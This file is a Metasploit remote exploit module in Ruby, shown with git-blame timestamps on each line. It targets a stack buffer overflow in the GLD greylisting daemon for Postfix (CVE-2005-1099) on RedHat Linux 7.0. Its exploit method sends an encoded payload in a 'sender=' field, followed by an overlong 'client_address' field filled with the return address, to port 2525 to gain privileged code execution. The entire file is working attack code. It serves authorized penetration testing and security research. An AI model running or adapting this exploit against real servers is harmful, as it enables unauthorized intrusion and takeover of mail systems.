2008-06-07 02:16:34 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2008-06-07 02:16:34 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
2016-03-07 08:56:58 +00:00
|
|
|
class Metasploit < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = GoodRanking
|
2008-06-07 02:16:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2008-06-07 02:16:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a stack buffer overflow in the Salim Gasmi
|
|
|
|
GLD <= 1.4 greylisting daemon for Postfix. By sending an
|
|
|
|
overly long string the stack can be overwritten.
|
|
|
|
},
|
|
|
|
'Author' => [ 'patrick' ],
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'linux',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2005-1099' ],
|
|
|
|
[ 'OSVDB', '15492' ],
|
|
|
|
[ 'BID', '13129' ],
|
|
|
|
[ 'EDB', '934' ]
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1000,
|
|
|
|
'BadChars' => "\x00\x0a\x0d\x20=",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Apr 12 2005'
|
|
|
|
))
|
2008-06-07 02:16:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(2525)
|
|
|
|
],
|
|
|
|
self.class
|
|
|
|
)
|
|
|
|
end
|
2010-07-01 23:33:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
|
|
|
connect
|
2008-06-07 02:16:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
sploit = "sender="+ payload.encoded + "\r\n"
|
|
|
|
sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"
|
2008-06-07 02:16:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
sock.put(sploit)
|
|
|
|
handler
|
|
|
|
disconnect
|
2008-06-07 02:16:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2008-06-07 02:16:34 +00:00
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|